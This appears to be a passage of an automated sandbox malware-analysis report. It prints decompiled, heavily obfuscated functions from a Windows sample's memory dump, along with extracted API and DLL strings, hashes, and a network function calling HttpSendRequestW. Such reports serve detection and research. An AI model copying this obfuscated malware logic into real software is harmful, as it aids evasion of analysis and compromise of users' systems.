                                                          			E004B6340(intOrPtr __ebx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _t15;
				char* _t17;
				char* _t18;
				char _t19;
				intOrPtr _t20;
				char* _t45;
				intOrPtr _t49;
				short _t69;
				short _t70;
				intOrPtr _t74;
				short _t78;
				void* _t97;
				signed int _t98;
				void* _t105;
				void* _t112;

				_t105 = __esi;
				_t97 = __edi;
				_t49 = __ebx;
				_t15 =  *((intOrPtr*)(_t112 - 8));
				if(_t15 == 0x1f6e48) {
					L2:
					_t82 =  *0x508212; // 0xf74b
					 *0x50afe3 = 0xb4;
					_t17 =  *0x50afe3; // -68
					 *0x5086cb =  *0x5086cb - _t97;
					 *0x50ad3c =  *0x50ad3c + _t97;
					_t98 = _t97 + _t97;
					_t18 = _t17;
					if(_t18 >= 0xc6f) {
						L5:
						_t19 = _t18 - 0xc5;
						 *0x50afe5 = _t19;
						_t98 = _t98 ^ 0x00d1269e;
						_t20 = _t19 - 0xf5;
						if(_t20 == 0) {
							 *0x508557 = _t20;
						}
						 *((intOrPtr*)(_t112 - 0x10)) = _t49;
						_t70 = _t69;
						if(_t70 >= _t70) {
							 *0x508166 = _t70;
							_t74 =  *0x50819c; // 0x8509
							 *0x5081e8 = _t82;
							 *0x508200 = _t82;
							 *0x50afe3 = "RtlEthernetStringToAddressW";
							 *0x50afe6 = 0xe6;
							 *((intOrPtr*)(_t112 - 0x14)) =  *((intOrPtr*)(_t112 - 0x14)) - _t74;
							 *0x5081ba = 0;
							 *0x50afe1 = 0;
							 *0x50afe5 =  *0x50afe5;
							 *0x50816e = 0x5e6a;
							_t78 = 0;
							 *0x508208 = 0x8db8;
							_t82 = 0x20fa;
							 *0x50a932 =  *0x50a932 + (_t105 - 0x0000b30e ^ 0x00afab12) + 0xb6bd54 - 0xa2766c;
							_t15 = 0xc8;
							_t98 = 0;
							goto L9;
						}
					} else {
						_t45 = "Microsoft.Office.Tools.Outlook.v9.0.ni.dll" + "Microsoft.Office.Tools.Outlook.v9.0.ni.dll";
						_t70 = _t69 + 0x58f039;
						 *0x50afde =  *0x50afde + _t70;
						if(_t70 < _t70) {
							goto L10;
						} else {
							_t82 =  *0x5081e4; // 0x5a9a
							 *0x50afe1 = _t45;
							_t18 =  *0x50afe1; // -128
							goto L5;
						}
					}
				} else {
					 *0x5080a4 =  *0x5080a4 + __ebx;
					_t78 = 0x79c6;
					_t82 =  !__edx;
					if(( !__edx & 0x00000094) <= 0) {
						L9:
						 *0x50afd8 = _t15 - 0xf0;
						_t45 = "credssp.dll";
						 *0x50813c = _t78;
						_t70 =  *0x508170; // 0x2575
						L10:
						 *0x5081a6 =  *0x5081a6 + _t70;
						 *0x50afe1 = _t45;
						_t105 = 0xd5ba;
						 *0x50afe5 = 0;
					} else {
						goto L2;
					}
				}
				 *0x5080ee =  *0x5080ee + "GetTickCount64";
				 *0x50822c = 0x8fcf;
				 *0x50afe5 = 0xc2;
				return 0xc2;
			}


















                                                          0x004b6340
                                                          0x004b6340
                                                          0x004b6340
                                                          0x004b6340
                                                          0x004b6348
                                                          0x004b6371
                                                          0x004b6371
                                                          0x004b637a
                                                          0x004b6382
                                                          0x004b6388
                                                          0x004b638f
                                                          0x004b6395
                                                          0x004b6398
                                                          0x004b639e
                                                          0x004b63e1
                                                          0x004b63e1
                                                          0x004b63e4
                                                          0x004b63e9
                                                          0x004b63ef
                                                          0x004b63f4
                                                          0x004b63f6
                                                          0x004b63f6
                                                          0x004b6405
                                                          0x004b640d
                                                          0x004b6411
                                                          0x004b6417
                                                          0x004b6421
                                                          0x004b6428
                                                          0x004b642f
                                                          0x004b643d
                                                          0x004b644c
                                                          0x004b6470
                                                          0x004b6481
                                                          0x004b6493
                                                          0x004b64a7
                                                          0x004b64d1
                                                          0x004b64d8
                                                          0x004b64e3
                                                          0x004b64ea
                                                          0x004b64f8
                                                          0x004b64fe
                                                          0x004b6500
                                                          0x00000000
                                                          0x004b6500
                                                          0x004b63a0
                                                          0x004b63a5
                                                          0x004b63b5
                                                          0x004b63bb
                                                          0x004b63c3
                                                          0x00000000
                                                          0x004b63cc
                                                          0x004b63ce
                                                          0x004b63d5
                                                          0x004b63db
                                                          0x00000000
                                                          0x004b63db
                                                          0x004b63c3
                                                          0x004b634a
                                                          0x004b634a
                                                          0x004b6361
                                                          0x004b6366
                                                          0x004b636b
                                                          0x004b6503
                                                          0x004b6506
                                                          0x004b6514
                                                          0x004b6528
                                                          0x004b6531
                                                          0x004b6538
                                                          0x004b6538
                                                          0x004b6553
                                                          0x004b655e
                                                          0x004b6563
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004b636b
                                                          0x004b6588
                                                          0x004b65a5
                                                          0x004b65b3
                                                          0x004b65c6

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AddInUtil.exe$B5d$BuildExplicitAccessWithNameA$GetTickCount64$Microsoft.Office.Tools.Outlook.v9.0.ni.dll$PenIMC_v0400.dll$RtlEthernetStringToAddressW$System.Web.DynamicData.dll$WcnEapAuthProxy.dll$api-ms-win-core-sysinfo-l1-1-0.dll$credssp.dll
                                                          • API String ID: 0-1059071573
                                                          • Opcode ID: f14f0edd4e5167c864ddc4fed995237339a14ed0bb74da184557d57777ac8cc7
                                                          • Instruction ID: 0301081f286ce31309b285bc4d05663f1b955527571aaf946867adba679d141a
                                                          • Opcode Fuzzy Hash: f14f0edd4e5167c864ddc4fed995237339a14ed0bb74da184557d57777ac8cc7
                                                          • Instruction Fuzzy Hash: BB5104696047428BCB00DF78ECA4AEE2BB1EB39320704557AC895D7767D668080EE725
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0046F403 Relevance: 12.8, Strings: 10, Instructions: 343COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 56%
                                                          			E0046F403(char* __eax, void* __ebx, intOrPtr __ecx, unsigned short __edi, void* __esi) {
				char* _t82;
				char* _t88;
				char* _t90;
				char* _t93;
				char* _t104;
				char* _t107;
				signed char _t113;
				char* _t114;
				char* _t117;
				char* _t119;
				char* _t133;
				char* _t155;
				char* _t175;
				void* _t176;
				intOrPtr _t205;
				void* _t214;
				signed char _t215;
				intOrPtr _t228;
				signed int _t242;
				unsigned short _t264;
				unsigned short _t265;
				void* _t269;
				signed short _t270;
				void* _t272;

				_t269 = __esi;
				_t264 = __edi;
				 *(_t272 - 8) = __eax;
				_t82 =  *(_t272 - 8);
				 *0x509e5b = _t82;
				 *((intOrPtr*)(_t272 - 0x10)) = __ecx;
				 *0x50afde =  *0x50afde + 0x6d07;
				_t243 = 0;
				 *(_t272 - 8) = _t82;
				_t214 = 0x6ca7;
				_push(0);
				 *0x508b27 = 0;
				_t88 =  *(_t272 - 8);
				if(0x6ca7 >= 0x6ca7) {
					if(0x6d07 < 0x6d07) {
						_t214 = 0x7917;
						 *0x5081e0 = 0x8b;
					}
					_t243 =  *0x508210; // 0x19f4
				}
				 *0x50afe3 = _t88;
				_push( *0x50812a);
				 *0x50afe5 = _t88;
				_t265 = _t264;
				 *(_t272 - 8) = _t88;
				_t90 =  *(_t272 - 8);
				 *(_t272 - 8) = _t90;
				if(_t90 < 0x21a10d) {
					L8:
					 *(_t272 - 0xc) = 0x30b570;
					_t155 = 0;
					goto L9;
				} else {
					_t155 = "WSearchMigPlugin.dll";
					_t242 = E0050814C; // 0x4487
					_t215 = _t242 - 0x6857a3;
					if((_t243 & 0x0000a3a5) == 0) {
						_t133 =  *0x50afe3; // -68
						if(_t133 + 0x1f6 < 0xf) {
							goto L8;
						}
						L9:
						_t215 = _t214 - 0x5f;
						_t265 = _t265 >> _t215;
					}
				}
				_t93 =  *(_t272 - 8);
				_push( *0x508048);
				 *(_t272 - 8) = _t93;
				if(_t93 < 0x22d5) {
					 *(_t272 - 0xc) = 0x3b872f;
					_t155 = 0;
					_t215 = 0xffffffffffa11d86;
				}
				 *0x508194 = _t215;
				_push( *0x508048);
				L004668D8(_t215, 0x991a, _t265, _t269, 1, 1, 0);
				 *(_t272 - 0xc) = _t155;
				 *0x508168 =  *0x508168 - 0x650b;
				_push( *0x5080e6);
				_t270 = _t269 - 0xd478;
				 *0x5080ec =  *0x5080ec + "GetTickCount64";
				E00465B85(_t270, 0, 1);
				 *0x50afde =  *0x50afde + 0x6f04;
				 *0x508226 = 0x8e8e;
				_t104 =  *(_t272 - 8);
				 *0x50afdd =  *0x50afdd + 0x6f04;
				 *(_t272 - 8) = _t104;
				if(_t104 == 0x22) {
					_t205 =  *0x508b23; // 0x32fb1f
					if(_t205 == 0x33f1c5) {
						 *0x5080f2 =  *0x5080f2 - _t205;
					}
					 *((intOrPtr*)(_t272 - 0x10)) = _t205;
				}
				 *0x508194 = 0x6939;
				_push( *0x508130);
				_t107 =  *(_t272 - 8);
				if("psxdllsvr.dll" <= 0xffffffffffffdaab) {
					L22:
					_t265 = _t265 - 1;
					goto L23;
				} else {
					if(0xffffffffffffb556 != 0xffffffffffffb556) {
						 *0x5081b0 = 0x8e8e;
					}
					if((_t270 & 0x0000b246) != 0) {
						L23:
					} else {
						if(_t107 == 0) {
							goto L22;
						}
					}
				}
				 *0x508168 = 0x5c96;
				_t228 =  *0x5081b8; // 0x0
				_push( *0x5080c8);
				 *(_t272 - 8) = _t107;
				_t175 = "RtlImpersonateSelfEx";
				if(_t175 <= _t175) {
					_t228 =  *((intOrPtr*)(_t272 - 0x10)) - 0x6690;
					 *0x50816e =  *0x50816e - _t228;
					 *0x50afde =  *0x50afde + _t228;
					if(0x80 >= 0) {
					}
					 *0x50afe5 = 0xc0;
					_t265 = _t265 + 0xd432d1;
					 *0x5084af = 0;
				}
				 *(_t272 - 0xc) = _t175;
				_t176 = _t175 - 0x47b584;
				 *0x508120 =  *0x508120 - _t228;
				 *((intOrPtr*)(_t272 - 0x10)) =  *((intOrPtr*)(_t272 - 0x10)) + _t228;
				_t251 = 0x7f42;
				 *0x509893 =  *0x509893 - 0x7f42;
				_push( *0x508044);
				_t113 =  *0x5088e7;
				 *0x50afda =  *0x50afda + _t176;
				if(_t176 >= 0x3b) {
					 *0x5081e0 =  *0x5081e0 + 0x7f42;
					_t251 = E00508230; // 0xa168
					if((_t113 & 0x000000b3) > 0) {
						 *0x50afe3 = _t113;
					}
					 *0x5086ff =  *0x5086ff - _t265;
					_t265 = 0;
					_t113 = 0x11f4d8;
					 *0x50afd9 =  *0x50afd9 - 0x11f4d8;
				}
				if(_t113 <= 0x2729d6) {
					 *(_t272 - 0xc) =  *(_t272 - 0xc) - 0x3c609d;
				}
				_t232 = 0xffffffffffffff8c;
				 *0x508198 =  *0x508198;
				 *0x50afdf =  *0x50afdf - _t251;
				_t114 =  *(_t272 - 8);
				_push( *0x5080b4);
				 *(_t272 - 8) = _t114;
				 *(_t272 - 8) = _t114;
				 *(_t272 - 0xc) = 0x21f753;
				_t117 = "credssp.dll";
				if(0x310bb6 < 0x38) {
					_t232 = 0x7eb0;
					 *0x50afdf =  *0x50afdf + _t251;
				}
				if((_t251 & 0x000000a1) < 0) {
				}
				 *0x50afe3 = _t117;
				_t119 =  *(_t272 - 8);
				_push( *0x5080b4);
				if( *((intOrPtr*)(_t272 - 0x10)) > _t232) {
					 *0x508140 =  *0x508140 + _t232;
				}
				 *(_t272 - 8) = _t119;
				 *((intOrPtr*)(_t272 - 0x10)) = 0x42efb7;
				_push( *0x508202);
				 *(_t272 - 0xc) = 0x30888e;
				_push(0);
				_push(E0046F90C);
				_push(E00465A23);
				return "CIRCoInst.dll";
			}



























                                                          0x0046f403
                                                          0x0046f403
                                                          0x0046f408
                                                          0x0046f40d
                                                          0x0046f41a
                                                          0x0046f41f
                                                          0x0046f429
                                                          0x0046f42f
                                                          0x0046f431
                                                          0x0046f447
                                                          0x0046f455
                                                          0x0046f45f
                                                          0x0046f46d
                                                          0x0046f472
                                                          0x0046f477
                                                          0x0046f479
                                                          0x0046f480
                                                          0x0046f480
                                                          0x0046f48a
                                                          0x0046f48a
                                                          0x0046f493
                                                          0x0046f49b
                                                          0x0046f4a2
                                                          0x0046f4a7
                                                          0x0046f4ab
                                                          0x0046f4ba
                                                          0x0046f4c3
                                                          0x0046f4cb
                                                          0x0046f512
                                                          0x0046f51d
                                                          0x0046f522
                                                          0x00000000
                                                          0x0046f4cd
                                                          0x0046f4db
                                                          0x0046f4e3
                                                          0x0046f4ea
                                                          0x0046f4fa
                                                          0x0046f4fe
                                                          0x0046f50e
                                                          0x00000000
                                                          0x0046f510
                                                          0x0046f524
                                                          0x0046f524
                                                          0x0046f527
                                                          0x0046f527
                                                          0x0046f4fa
                                                          0x0046f530
                                                          0x0046f533
                                                          0x0046f53a
                                                          0x0046f541
                                                          0x0046f54b
                                                          0x0046f54e
                                                          0x0046f553
                                                          0x0046f553
                                                          0x0046f55c
                                                          0x0046f57a
                                                          0x0046f58e
                                                          0x0046f593
                                                          0x0046f59f
                                                          0x0046f5b6
                                                          0x0046f5bd
                                                          0x0046f5d2
                                                          0x0046f5de
                                                          0x0046f5e7
                                                          0x0046f5f6
                                                          0x0046f605
                                                          0x0046f614
                                                          0x0046f62c
                                                          0x0046f631
                                                          0x0046f633
                                                          0x0046f63f
                                                          0x0046f641
                                                          0x0046f641
                                                          0x0046f648
                                                          0x0046f648
                                                          0x0046f656
                                                          0x0046f662
                                                          0x0046f679
                                                          0x0046f683
                                                          0x0046f6b6
                                                          0x0046f6b6
                                                          0x00000000
                                                          0x0046f685
                                                          0x0046f68a
                                                          0x0046f68c
                                                          0x0046f69e
                                                          0x0046f6a7
                                                          0x00000000
                                                          0x0046f6a9
                                                          0x0046f6b2
                                                          0x00000000
                                                          0x0046f6b4
                                                          0x0046f6b2
                                                          0x0046f6a7
                                                          0x0046f6d2
                                                          0x0046f6dc
                                                          0x0046f6e7
                                                          0x0046f6f4
                                                          0x0046f6fb
                                                          0x0046f702
                                                          0x0046f707
                                                          0x0046f70c
                                                          0x0046f713
                                                          0x0046f71e
                                                          0x0046f71e
                                                          0x0046f72f
                                                          0x0046f736
                                                          0x0046f73c
                                                          0x0046f73c
                                                          0x0046f74a
                                                          0x0046f74f
                                                          0x0046f755
                                                          0x0046f75c
                                                          0x0046f765
                                                          0x0046f769
                                                          0x0046f775
                                                          0x0046f77f
                                                          0x0046f784
                                                          0x0046f78d
                                                          0x0046f7ad
                                                          0x0046f7b7
                                                          0x0046f7c1
                                                          0x0046f7c3
                                                          0x0046f7c3
                                                          0x0046f7d1
                                                          0x0046f7d8
                                                          0x0046f7dc
                                                          0x0046f7e1
                                                          0x0046f7e1
                                                          0x0046f7ec
                                                          0x0046f7f6
                                                          0x0046f7f6
                                                          0x0046f7fe
                                                          0x0046f801
                                                          0x0046f808
                                                          0x0046f80e
                                                          0x0046f811
                                                          0x0046f836
                                                          0x0046f83e
                                                          0x0046f84d
                                                          0x0046f855
                                                          0x0046f85d
                                                          0x0046f873
                                                          0x0046f877
                                                          0x0046f877
                                                          0x0046f880
                                                          0x0046f880
                                                          0x0046f889
                                                          0x0046f89c
                                                          0x0046f8a4
                                                          0x0046f8b0
                                                          0x0046f8b2
                                                          0x0046f8b2
                                                          0x0046f8b9
                                                          0x0046f8cb
                                                          0x0046f8db
                                                          0x0046f8fc
                                                          0x0046f8ff
                                                          0x0046f901
                                                          0x0046f906
                                                          0x0046f90b

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CIRCoInst.dll$CNHMWL.dll$Display.dll$GetTickCount64$RtlImpersonateSelfEx$WSearchMigPlugin.dll$credssp.dll$diskperf.exe$psxdllsvr.dll$xmllite.dll
                                                          • API String ID: 0-2321095575
                                                          • Opcode ID: 8e4bcaf9515b674483f8ea6145b4476ae6132be11e37c9e0a8221d2c51eacd89
                                                          • Instruction ID: 0f2d46414affa3ede5ff43e5b0508a43b4beff3773566a59eefb5c6932396f47
                                                          • Opcode Fuzzy Hash: 8e4bcaf9515b674483f8ea6145b4476ae6132be11e37c9e0a8221d2c51eacd89
                                                          • Instruction Fuzzy Hash: F7D1BFB9A107069FCB00DFB8E8D4ADD7BB1FB39310F04817AD995A7362E6780949DB05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0048600C Relevance: 12.7, Strings: 10, Instructions: 208COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 65%
                                                          			E0048600C(void* __ecx, void* __edi, signed int __esi) {
				char _t55;
				intOrPtr _t57;
				char _t73;
				intOrPtr _t79;
				intOrPtr _t81;
				char _t91;
				char* _t102;
				char* _t109;
				intOrPtr _t114;
				signed int _t131;
				short _t133;
				signed int _t136;
				signed int _t137;
				signed int _t143;
				void* _t144;
				void* _t152;
				void* _t153;
				signed int _t156;
				signed int _t157;
				void* _t160;

				_t156 = __esi;
				_t152 = __edi;
				 *(_t160 - 0xc) =  &(( *(_t160 - 0xc))[(char*)("GetTickCount64")]);
				_push( *0x5080c8);
				_push(0x2f4b41);
				E00465A23();
				if(0x2f4b41 <= 0x2f4b41) {
					 *((intOrPtr*)(_t160 - 0x10)) =  *((intOrPtr*)(_t160 - 0x10)) - 0x5c27;
				}
				_t143 =  *0x5081b4; // 0x19f4
				_push( *0x5080d8);
				_t55 =  *((intOrPtr*)(_t160 - 8));
				_t131 = _t143;
				if((_t143 & 0x000085aa) < 0) {
					_t143 = _t156;
					 *0x50afe5 = _t55;
				}
				_t91 =  *0x50afe5; // -1
				 *((intOrPtr*)(_t160 - 8)) = _t55;
				if(_t91 >= 0x37dd) {
					L7:
					_t143 =  *0x50820a; // 0x8e68
				} else {
					 *0x50afdd =  *0x50afdd - _t131;
					if(_t131 < _t131) {
						_t131 = 0x7ed3;
						 *0x509763 =  *0x509763 + _t143;
						 *0x5081d8 = _t143;
						goto L7;
					}
				}
				_t144 = _t143 - 0xb1;
				 *0x50825c =  *0x50825c + _t156;
				 *0x50a646 =  *0x50a646 + _t156;
				_t57 =  *0x50afe3; // -68
				_t153 = _t152 + 0xdd70;
				 *0x50afe5 =  *0x50afe5 + _t57;
				_push( *0x50813a);
				_t157 = _t156 | 0x00c077ea;
				_t133 = 0x7231;
				_t102 = "xmllite.dll";
				if(_t102 >= 0x3c0b) {
					if(_t102 < _t102) {
						 *0x50afde =  *0x50afde + 0x5b95;
						_t133 = 0x175b75a;
						_t144 = 0x8ae3;
					}
					 *0x509a43 =  *0x509a43 + _t144;
				}
				 *0x508280 =  *0x508280 + _t157;
				_push( *0x508044);
				 *(_t160 - 0xc) = 0x30a7d7;
				 *0x508138 = _t133;
				_t108 = 0x175b75a;
				_t136 = _t133 + _t133 + _t133 + _t133 + _t133 + _t133 + _t133 + _t133;
				E0046776D(_t153, _t157, _t136, 0);
				 *((intOrPtr*)(_t160 - 0x14)) =  *((intOrPtr*)(_t160 - 0x14)) - _t136;
				_t137 =  !_t136;
				_t73 =  *((intOrPtr*)(_t160 - 8));
				if(_t73 <= 0x909e7) {
					if(_t73 != 0x172e6c) {
						L17:
						if(_t108 > _t108 || _t137 >= _t137) {
							goto L20;
						}
					} else {
						if(_t73 == 0x3180) {
							if(0x175e0f7 > 0x175e0f7) {
								L20:
								_t137 =  *0x508192; // 0x60e8
								goto L21;
							} else {
								_t108 = 0x2ebc1ee;
								goto L17;
							}
						}
					}
				}
				_push( *0x508026);
				 *0x50afe5 = _t73;
				 *((intOrPtr*)(_t160 - 8)) = _t73;
				_t109 = "EtwEventWriteStartScenario";
				 *(_t160 - 0xc) = _t109;
				 *0x508a5f = _t109;
				_t79 =  *((intOrPtr*)(_t160 - 8));
				_t114 = "GetAccessPermissionsForObjectW" + "GetAccessPermissionsForObjectW";
				if(_t114 >= _t137) {
					_t137 =  !(_t137 - 0x66);
					 *0x508184 = _t137;
				}
				 *0x508204 =  *0x508204 + 0x8c68;
				 *0x509ba3 =  *0x509ba3 + 0x8c68;
				 *((intOrPtr*)(_t160 - 8)) = _t79;
				 *0x508bd3 = _t114;
				_t81 =  *((intOrPtr*)(_t160 - 8));
				 *0x508136 = _t137;
				_push( *0x50806e);
				 *((intOrPtr*)(_t160 - 8)) = _t81;
				 *0x508afb =  *0x508afb;
				 *(_t160 - 0xc) = 0;
				_push(0);
				_push(E00486320);
				_push(E004650DC);
				return _t81 - 0x1dbd86;
			}























                                                          0x0048600c
                                                          0x0048600c
                                                          0x00486017
                                                          0x0048601d
                                                          0x0048603d
                                                          0x0048603e
                                                          0x00486045
                                                          0x0048604e
                                                          0x0048604e
                                                          0x00486057
                                                          0x00486061
                                                          0x00486083
                                                          0x00486086
                                                          0x0048608e
                                                          0x00486098
                                                          0x004860a3
                                                          0x004860a9
                                                          0x004860ab
                                                          0x004860b1
                                                          0x004860be
                                                          0x004860ea
                                                          0x004860ea
                                                          0x004860c0
                                                          0x004860c8
                                                          0x004860d0
                                                          0x004860d9
                                                          0x004860dd
                                                          0x004860e3
                                                          0x00000000
                                                          0x004860e3
                                                          0x004860d0
                                                          0x004860f1
                                                          0x004860f4
                                                          0x004860fb
                                                          0x00486101
                                                          0x00486107
                                                          0x0048610c
                                                          0x00486115
                                                          0x0048611c
                                                          0x00486161
                                                          0x0048616a
                                                          0x00486174
                                                          0x00486178
                                                          0x00486181
                                                          0x00486189
                                                          0x0048618b
                                                          0x0048618b
                                                          0x0048618f
                                                          0x0048618f
                                                          0x0048619d
                                                          0x004861a7
                                                          0x004861c3
                                                          0x004861d0
                                                          0x004861ee
                                                          0x004861f0
                                                          0x004861f6
                                                          0x004861fb
                                                          0x004861fe
                                                          0x00486203
                                                          0x0048620b
                                                          0x00486212
                                                          0x00486226
                                                          0x00486228
                                                          0x00000000
                                                          0x00000000
                                                          0x00486214
                                                          0x0048621d
                                                          0x00486222
                                                          0x00486232
                                                          0x00486232
                                                          0x00000000
                                                          0x00486224
                                                          0x00486224
                                                          0x00000000
                                                          0x00486224
                                                          0x00486222
                                                          0x0048621d
                                                          0x00486212
                                                          0x00486245
                                                          0x00486252
                                                          0x00486260
                                                          0x0048626b
                                                          0x00486270
                                                          0x0048627d
                                                          0x0048629c
                                                          0x004862a4
                                                          0x004862a8
                                                          0x004862ad
                                                          0x004862af
                                                          0x004862af
                                                          0x004862bd
                                                          0x004862c4
                                                          0x004862cd
                                                          0x004862d5
                                                          0x004862e6
                                                          0x004862e9
                                                          0x004862f0
                                                          0x004862fc
                                                          0x00486304
                                                          0x0048630a
                                                          0x00486313
                                                          0x00486315
                                                          0x0048631a
                                                          0x0048631f

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AK/$CIRCoInst.dll$EtwEventWriteStartScenario$GetAccessPermissionsForObjectW$GetTickCount64$RtlImpersonateSelfEx$WindowsCodecs.dll$credssp.dll$ddrawex.dll$xmllite.dll
                                                          • API String ID: 0-1001261853
                                                          • Opcode ID: 25b5927973b523345188877257c9ac8f286cac5c7cdcb5629bf84cd0f0a7c015
                                                          • Instruction ID: 52f8df29cf54d983a296b90c8498593450019515b3449586089524d7ce741889
                                                          • Opcode Fuzzy Hash: 25b5927973b523345188877257c9ac8f286cac5c7cdcb5629bf84cd0f0a7c015
                                                          • Instruction Fuzzy Hash: FE818479E007469FCB00EFA9E8D49DDBBF0FB39320F4484AAD94493356E6780949DB05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004D7AEB Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 115networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • HttpSendRequestW.WININET(?,00000000), ref: 004D7BC5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: HttpRequestSend
                                                          • String ID: :yP$>$GetAccessPermissionsForObjectW$WindowsCodecs.dll$comcat.dll$tsbyuv.dll
                                                          • API String ID: 360639707-497006389
                                                          • Opcode ID: f930cfe16c32ecd36027b7daa8b542a44a2f4e853c880a36e3592e0af8863439
                                                          • Instruction ID: 7bcd8ff903d42b9b13cb8fecdad8fbb4b9464df85c396470a1dc86448a264a6e
                                                          • Opcode Fuzzy Hash: f930cfe16c32ecd36027b7daa8b542a44a2f4e853c880a36e3592e0af8863439
                                                          • Instruction Fuzzy Hash: 74412579A503428FCB00DF78EC94ADD3BB1EB39320F04816BD894D73A6EA74054AEB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00495303 Relevance: 10.2, Strings: 8, Instructions: 170COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 34%
                                                          			E00495303(void* __ebx, void* __ecx, void* __edi) {
				intOrPtr _t34;
				char _t36;
				intOrPtr _t38;
				intOrPtr _t41;
				char _t49;
				char _t51;
				signed char _t97;
				void* _t124;
				void* _t125;
				void* _t126;
				signed int _t129;
				void* _t130;

				_t124 = __edi;
				_push(1);
				E00465A23();
				_t97 =  *0x508192; // 0x60e8
				_t34 =  *((intOrPtr*)(_t130 - 8));
				if(0x183e20 >> _t97 >= 0x2662a4) {
				}
				 *((intOrPtr*)(_t130 - 8)) = _t34;
				_t36 =  *((intOrPtr*)(_t130 - 8));
				 *(_t130 - 0xc) = "EtwEventWriteStartScenario";
				 *0x508cfb = _t36;
				_t129 = 0x50afe3;
				if(_t36 >= 0) {
					 *0x50afe5 = _t36;
				}
				_t125 = _t124;
				 *((intOrPtr*)(_t130 - 8)) = _t36;
				_t38 =  *((intOrPtr*)(_t130 - 8));
				 *(_t130 - 0xc) = 0x3756c6;
				if(0x3756c6 <= 0x3756c6) {
					L8:
					 *0x50b010 =  *0x50b010 + _t125;
					 *0x50afd9 =  *0x50afd9 + _t38;
					goto L9;
				} else {
					if(0xffffffffffa5ab2c != 0xffffffffffa5ab2c || 0x9440 < 0) {
						L9:
						_push(0);
						 *((intOrPtr*)(_t130 - 8)) = _t38;
						_t41 =  *((intOrPtr*)(_t130 - 8));
						 *0x50815a = 0x6736;
						if(0x6736 < 0x6736) {
							if(0x6736 >= 0x6736) {
							}
						}
						 *0x50825e =  *0x50825e - _t129;
						 *0x508276 =  *0x508276 + _t129;
						_push( *0x508114);
						 *((intOrPtr*)(_t130 - 8)) = _t41;
						 *(_t130 - 0xc) = "WindowsCodecs.dll";
						 *(_t130 - 0xc) = 0x36d39e;
						 *0x508182 = 0x5a94;
						 *(_t130 - 0xc) = 0;
						 *0x508136 = 0x5a94;
						_t49 =  *((intOrPtr*)(_t130 - 8));
						 *0x5081d4 = 0x8bf9;
						_push( *0x508044);
						 *0x50afe5 = _t49;
						_t126 = _t125 - 0xdb574f;
						 *((intOrPtr*)(_t130 - 8)) = _t49;
						_t51 =  *((intOrPtr*)(_t130 - 8));
						if(_t49 <= 0x3861) {
							L18:
							 *((intOrPtr*)(_t130 - 8)) = _t51;
							goto L19;
						} else {
							 *0x508158 = 0xc90031;
							 *0x50afe0 =  *0x50afe0 - 0xffffffffffffe28e;
							if((_t129 & 0x00a3b51d) != 0) {
								L19:
								_push( *0x508186);
								 *((intOrPtr*)(_t130 - 8)) = _t51;
								_push(0);
								_push(1);
								_push(E00495584);
								_push(E0046776D);
								return "wmi.dll";
							}
							 *0x50afe3 = _t51;
							if(_t126 - 0xddf4 < 0) {
								goto L19;
							}
							 *0x50afe6 = _t51;
							if(_t51 < 0x12) {
								 *0x508054 =  *0x508054 + _t51;
							}
							goto L18;
						}
					} else {
						 *0x50afe3 =  *0x50afe3 + _t38;
						_t129 =  !_t129;
						goto L8;
					}
				}
			}















                                                          0x00495303
                                                          0x00495303
                                                          0x00495305
                                                          0x0049530f
                                                          0x00495316
                                                          0x0049532a
                                                          0x0049532a
                                                          0x0049533e
                                                          0x00495343
                                                          0x0049534b
                                                          0x0049534e
                                                          0x00495353
                                                          0x0049535b
                                                          0x0049535d
                                                          0x0049535d
                                                          0x00495362
                                                          0x00495364
                                                          0x00495369
                                                          0x00495371
                                                          0x00495377
                                                          0x004953a8
                                                          0x004953b2
                                                          0x004953c1
                                                          0x00000000
                                                          0x00495379
                                                          0x00495385
                                                          0x004953c7
                                                          0x004953cc
                                                          0x004953d2
                                                          0x004953e7
                                                          0x004953ea
                                                          0x004953f4
                                                          0x004953f8
                                                          0x004953f8
                                                          0x004953fe
                                                          0x0049540a
                                                          0x00495411
                                                          0x00495418
                                                          0x00495421
                                                          0x0049542e
                                                          0x00495463
                                                          0x00495474
                                                          0x00495490
                                                          0x0049549c
                                                          0x004954a5
                                                          0x004954b4
                                                          0x004954c5
                                                          0x004954cc
                                                          0x004954d5
                                                          0x004954db
                                                          0x004954e3
                                                          0x004954eb
                                                          0x00495546
                                                          0x00495546
                                                          0x00000000
                                                          0x004954ed
                                                          0x004954f5
                                                          0x0049550a
                                                          0x00495520
                                                          0x00495561
                                                          0x00495561
                                                          0x0049556a
                                                          0x00495575
                                                          0x00495577
                                                          0x00495579
                                                          0x0049557e
